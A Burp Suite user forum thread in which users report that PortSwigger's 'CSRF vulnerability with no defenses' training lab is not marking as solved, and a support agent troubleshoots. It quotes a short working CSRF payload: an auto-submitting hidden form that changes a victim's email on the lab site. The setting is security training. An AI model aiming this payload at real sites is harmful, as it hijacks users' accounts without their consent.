Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: CSRF vulnerability with no defenses

Sunny | Last updated: Aug 17, 2020 05:03AM UTC

Hello, going through the lab https://portswigger.net/web-security/csrf/lab-no-defenses, for some reason he does not solved. https://forum.portswigger.net/thread/lab-csrf-vulnerability-with-no-defenses-35a98ebd I had some problems with the passage, I found people who had the same problems. Here is the video: https://www.youtube.com/watch?v=lkDj4WA9AEg The solution I'm using is: ``` <form method="POST" action="https://ac541f2c1facfe6680197eeb00cd0062.web-security-academy.net/email/change-email"> <input type="hidden" name="email" value="test&#64;test&#46;com"> </form> <script> document.forms[0].submit(); </script> ```

Ben, PortSwigger Agent | Last updated: Aug 17, 2020 01:26PM UTC

Hi, I have just used the solution that you have provided in your forum post (changing the lab ID to the one i am using) and it has successfully solved the lab for me. Are you storing the exploit after you have copied it into the Exploit Server? Are you using the correct Lab ID URL?

Sunny | Last updated: Aug 18, 2020 04:32AM UTC

Hi, yes, I tried several methods already, and through XHR, and recreated the rooms several times, it still did not work.

Ben, PortSwigger Agent | Last updated: Aug 18, 2020 07:34AM UTC

Hi, Are you able to provide us with step by step details of how you are trying to solve the lab so that we can take a further look for you? As mentioned, using the solution that you initially provided worked so the lab is functioning as expected.

Carolina | Last updated: May 25, 2023 02:44PM UTC

Still the same issue, it doesn't work despite using several machines and networks, also doing several attempts.

Ben, PortSwigger Agent | Last updated: May 25, 2023 05:18PM UTC

Hi Carolina, I have just run through this lab and been able to solve it using the solution provided so it is working as expected. Are you able to provide us with details of what you are configuring in the Exploit Server? Have you paid attention to the note in 'Hint' box?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.